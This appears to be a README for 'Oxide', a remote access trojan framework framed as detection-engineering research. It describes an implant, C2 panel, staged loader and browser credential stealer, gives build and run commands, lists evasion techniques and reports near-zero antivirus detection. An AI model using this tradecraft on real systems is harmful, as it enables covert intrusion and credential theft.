Cross-platform RAT framework for security research and detection engineering.
Built to demonstrate threat actor TTPs at the code level. Every component ships with paired YARA rules, Sigma rules, network signatures, and IR playbooks.
All testing occurs in an isolated VM lab (host-only network, no internet bridge).
Default C2 address is localhost. See DISCLAIMER.md.
Stage1 loader: 1/70 VirusTotal same-day on 2026-05-07. Single hit: Rising RDML (Chinese AV ML, generic Kryptik label). Microsoft Defender, BitDefender cluster, SentinelOne, CrowdStrike, Kaspersky, ESET, Sophos, Symantec: undetected. Scan · Per-engine breakdown · Detection screenshot · Behavior screenshot
A reference implementation of a modern RAT framework used to:
- Understand implant-panel communication at the protocol level
- Build detection rules against known behaviour, not guesswork
- Run purple team exercises with documented attack and defend artifacts
Reference architecture: AsyncRAT (C#, 2019). Oxide modernises it: Rust implant, cross-platform persistence, web panel, staged loader, standalone stealer.
| Repo | Role | Language |
|---|---|---|
| oxide (this) | Implant + C2 panel + detection | Rust + Python |
| oxide-loader | 3-stage delivery chain | C + Rust |
| oxide-stealer | Browser credential extraction | Rust |
| oxide-infra | Lab infrastructure automation | Terraform + Ansible |
Prerequisites: Rust stable, Python 3.11+, libvirt/KVM, gcc
bash lab-setup/gen_certs.sh
cargo build -p oxide-implant
cd panel && pip install -e . && python -m panel.panel.main --web-port 8080 --c2-port 4444
OXIDE_C2_HOST=10.10.100.1 ./target/debug/oxide-implantOpen http://localhost:8080 (admin / oxide).
[4-byte LE length][AES-256-GCM encrypted JSON] over TLS 1.3.
Command types: shell, file_list, file_download, screenshot,
process_list, persist_status, persist_remove, steal.
- Upload oxide-stealer binary:
POST /api/staging/upload(no stage_number) - Click Steal in the panel bot detail view
- Implant downloads binary from staging, validates SHA-256, executes as subprocess
- Credentials appear in the Credentials tab
All techniques in detection/COVERAGE_MATRIX.md.
detection/
├── sigma/ 15 rules: persistence, commands, C2, credential access, tool staging
├── yara/ 3 rules
├── network/ Zeek, Suricata, JA3/JA4
└── ir/ 5 IR playbooks
cargo test
pytest panel/tests/ -v
pytest tests/vm/ -v # requires VMs (see tests/vm/README.md)oxide/
├── implant/ Rust implant
├── shared/ Shared crypto + packet types
├── panel/ Python/FastAPI C2 panel
├── detection/ YARA, Sigma, network, IR
├── docs/ Architecture and protocol docs
├── tests/vm/ VM integration tests (libvirt)
└── lab-setup/ Certificate generation
- oxide-loader - 3-stage delivery chain
- oxide-stealer - Browser credential extraction
- oxide-infra - Lab infrastructure (Terraform + Ansible)
| Binary | Detections | Date | Link |
|---|---|---|---|
| stage1 loader (RtkAudHlpr.exe, polymorphic seed 4242, signed lab CA) | 1/70 | 2026-05-07 | scan |
| oxide-implant (Windows x86_64) | 5/72 | earlier | scan |
Stage1 1/70 (2026-05-07). Single hit: Rising RDML (Chinese AV ML, generic Trojan.Kryptik label). Microsoft Defender, Bitdefender cluster, SentinelOne static AI, CrowdStrike Falcon, Kaspersky, ESET-NOD32, Sophos, Symantec, Cynet, Trellix, DeepInstinct, Bkav Pro: undetected. Per-engine breakdown, screenshots, and 14-day drift watch schedule in docs/vt-scans/v1.0-stage1-S40-seed4242.md.
VT Behavior tab final state (170 min after submission, all 4 sandboxes complete):
| Field | Value |
|---|---|
| Detections | NOT FOUND |
| IDS Rules | NOT FOUND |
| Sigma Rules | NOT FOUND |
| Dropped Files | NOT FOUND |
| Mitre Signatures | 1 LOW, 2 INFO (capability tags T1027, T1071, T1129; not detection verdicts) |
| Network comms | 5 DNS, 1 IP (mostly sandbox-VM Windows / Office telemetry; binary's own fetch attempt fails as expected without lab C2) |
The S40 anti-emulation timing probe permits execution after the 9.5 s quiet window, the binary attempts its fetch path, the fetch fails in the sandbox (lab URL unreachable), and the binary exits gracefully. No file drops, no persistence writes, no privilege escalation, no injection observed by any of the 4 sandboxes. Detection score unchanged at 1/70.
Screenshots:
Stage1 hardening pipeline (S33 to S40): compile-time string XOR + PEB walk + djb2 API resolution + Hell's Hall indirect syscalls + Realtek HD Audio Manager VERSIONINFO mimicry + lab CA self-sign + decoy IAT shaping + QPC/Sleep + CPU-loop anti-emulation + polymorphic build. Source in oxide-loader/stage1/ and crypter/packer/. Each technique ships paired YARA + Sigma in detection/.
oxide-implant 5/72. Earlier measurement on the implant binary (different artifact, different threat surface). Heuristic/ML engines flag unsigned Rust PE shape; no major signature or behavioural detection. SHA256 69ba7de6d505dbf6c655895718e65d49088f673a7a798177bd5c3fe9eef4744d.
Reproducibility: the polymorphic packer is deterministic per --seed, so the stage1 SHA above is reproducible from source. Rust builds are not reproducible by default; the implant SHA will not match across rebuilds.
VT submission policy: same-day single submission per artifact. No cross-submission to AnyRun / Hybrid Analysis / Joe Sandbox / Triage. No prebuilt binaries attached to GitHub releases. See docs/vt-scans/ for per-submission records.
Honest disclosure of what is and is not validated end to end.
| Component | Status |
|---|---|
| Stage1 loader hardening (S33 to S40) | Code complete, VT-measured 1/70 on 2026-05-07 |
Polymorphic packer (crypter/packer/) |
Code complete, 38/38 mock tests pass, deterministic per seed verified |
Benchmark harness (tests/benchmark/) |
Code complete, 38/38 mock tests pass, real-lab fixture refresh deferred |
| Lab IaC (oxide-infra repo, S36) | Code complete, runtime not validated. 6 known issues documented in oxide-infra/docs/lab/TROUBLESHOOTING.md. |
make benchmark SCENARIO=full_chain against real Defender + Wazuh + Zeek |
Pending. Requires lab bring-up + harness fixture refresh. |
DETECTION_BASELINE.md (per-TTP coverage + dwell time) |
Pending. Generated by benchmark harness once real-lab run completes. |
| Public blog post / screencast | Not produced. |
| Prebuilt binaries on GitHub release | Not produced. Source-only by policy. |
The stage1 0/72 path (S33-S40) is independent of the lab benchmark path (S36-S37-S38 thread B). The 1/70 result above measures the loader against static and lightweight-dynamic VT engines. Full closed-loop measurement against live EDR is the next milestone (v1.0 final).